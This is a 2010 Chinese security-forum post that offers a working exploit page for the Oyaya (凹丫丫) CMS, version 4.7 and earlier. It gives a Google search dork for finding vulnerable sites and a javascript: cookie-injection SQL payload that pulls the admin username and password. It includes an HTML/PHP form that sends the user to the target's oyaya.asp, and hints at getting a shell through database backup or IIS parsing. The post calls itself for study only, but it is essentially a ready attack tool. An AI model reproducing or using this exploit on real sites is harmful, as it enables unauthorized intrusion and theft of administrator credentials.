标题:
凹丫丫 4.7 及其以下版本通杀0day
[打印本页]
作者:
keylong
时间:
2010-6-4 23:02
标题:
凹丫丫 4.7 及其以下版本通杀0day
凹丫丫 4.7 及其以下版本通杀0day
文章录入:浣花溪 责任编辑:snow 564
【字体:小 大】
EXP:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>-hi.baidu.com/5427518-</title>
</head>
<style type="text/css">
<!--
.STYLE1 { font-size:13px ; font-family: Arial, Helvetica, sans-serif}
-->
</style>
<span class="STYLE1">凹丫丫 4.7 及其以下版本通杀Xday<br><br>仅供学习研究,使用者若违反法律后果自负<br><br>说明:<br>
0.google : inurl:/otype.asp?classid= <br>
1.键入目标站,没意外的话你会等上一会,因为要等脚本超时出错,建议去喝茶。<br>
2.然后地址栏键入下面的代码,进行JavaScript hijack。<br>
3.刷新一次,右键查看源文件,用户名密码就出来了。<br>
4.要是你RP不好,楞没爆出来,那就先清理干净cookie再玩。<br>
5.如果没有oyaya.asp,原因很可能是目标站版本低于4.7,老版本直接cookie注射。<br><br>
<font color=red>
javascript:alert(document.cookie="n="+escape("2 1 as id,2 as title,admin&password as oStyle,4,5,6,7,8,9 from admin union all select top 1"));
</font>
<form action="" method="post" enctype="multipart/form-data" class="STYLE1">
<br><br>
准备好了就填写吧!示例:
www.hackqing.cn
<br><br>
目标站:<input type="text" name="a" />
<input type="submit" name="submit" value="提交" /><br><br>
后台备份,iis解析,随你怎么用。
</form></span>
<span class="STYLE1">
<?php
if(!empty($_POST['a']))
{
header("Location: http://".$_POST['a']."/oyaya.asp");
}
?></span>
以上代码保存为htm,或html
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2